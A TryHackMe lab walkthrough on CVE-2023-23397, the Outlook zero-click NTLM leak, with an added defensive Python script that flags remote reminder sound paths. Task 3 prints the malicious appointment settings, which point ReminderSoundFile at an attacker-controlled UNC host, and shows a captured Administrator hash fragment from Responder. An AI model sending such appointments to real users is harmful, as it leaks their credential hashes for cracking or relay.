TryHackMe - Outlook NTLM Leak


In this walkthrough, we will go through the Outlook NTLM Leak room from TryHackMe. This room covers the exploitation of CVE-2023-23397, which leaks a user’s password hashes when they are sent an email. So, let’s get started without any delay.


Task 1 – Introduction

Question 1 – Start the VM and continue learning!

Done

On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.

Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.


Task 2 – Abusing Appointment Alerts

Question 1 – Click and continue learning!

Done

Task 3 – Crafting a Malicious Appointment

Question 1 – Click and continue learning!

Done
Responder

AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\10.10.183.48\nonexistent\sound.wav"

Administrator::THM-LAB:ceea8682077d7ab
NTLM hash capture
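
A defender-side check for the three reminder properties shown above, as an added example that is not part of the original walkthrough or the room's own material: it flags appointment items whose ReminderSoundFile resolves to a remote host. The dict layout of the exported items, the function names and the files.corp.example allowlist entry are assumptions made for illustration.

```python
import re

# \\host\share, //host/share and \\?\UNC\host\share all resolve to a remote host.
_UNC = re.compile(
    r'^(?:[\\/]{2}\?[\\/]UNC[\\/]|[\\/]{2})(?P<host>[^\\/?]+)[\\/]', re.I)

def remote_host(sound_file):
    """Return the host a reminder sound path points at, or None if it is local."""
    m = _UNC.match((sound_file or "").strip().strip('"'))
    if not m:
        return None  # drive-letter path, empty value, or \\?\C:\... local form
    # Drop a WebDAV suffix such as host@SSL@443 or host@8080.
    host = m.group("host").split("@")[0].lower()
    return None if host == "." else host  # \\.\ is the local device namespace

def audit(items, allowed_hosts=frozenset()):
    """Flag items whose reminder sound is fetched from a host not on the allowlist.

    Returns (subject, host, flags_set) tuples; flags_set is True when both
    ReminderOverrideDefault and ReminderPlaySound are enabled, as on this page.
    """
    findings = []
    for item in items:
        host = remote_host(item.get("ReminderSoundFile"))
        if host and host not in allowed_hosts:
            flags_set = bool(item.get("ReminderOverrideDefault")
                             and item.get("ReminderPlaySound"))
            findings.append((item.get("Subject", ""), host, flags_set))
    return findings

# Constructed sample export (hypothetical layout; only the first path is from the page).
SAMPLE_ITEMS = [
    {"Subject": "Quarterly review", "ReminderOverrideDefault": True,
     "ReminderPlaySound": True,
     "ReminderSoundFile": r"\\10.10.183.48\nonexistent\sound.wav"},
    {"Subject": "Standup", "ReminderOverrideDefault": False,
     "ReminderPlaySound": True,
     "ReminderSoundFile": r"C:\Windows\Media\Alarm01.wav"},
    {"Subject": "Lunch", "ReminderOverrideDefault": True,
     "ReminderPlaySound": True,
     "ReminderSoundFile": r"\\files.corp.example@SSL@443\media\chime.wav"},
    {"Subject": "1:1", "ReminderSoundFile": ""},
]

if __name__ == "__main__":
    for subject, host, flags_set in audit(SAMPLE_ITEMS, {"files.corp.example"}):
        print(f"REVIEW {subject!r}: reminder sound on {host} (flags set: {flags_set})")
```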

Task 4 – Weaponizing the Vulnerability

Question 1 – Click and continue learning!

Done

Task 5 – Detection/Mitigation

Question 1 – Click and continue learning!

Done

Task 6 – Conclusions


So that was “Outlook NTLM Leak” for you. In this room, we covered CVE-2023-23397, a critical zero-click vulnerability that impacts all versions of the Outlook desktop app on any Windows system. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system, escalate privileges and much more. On that note, I will take my leave and will meet you in the next one. Till then, “Keep Hacking”.
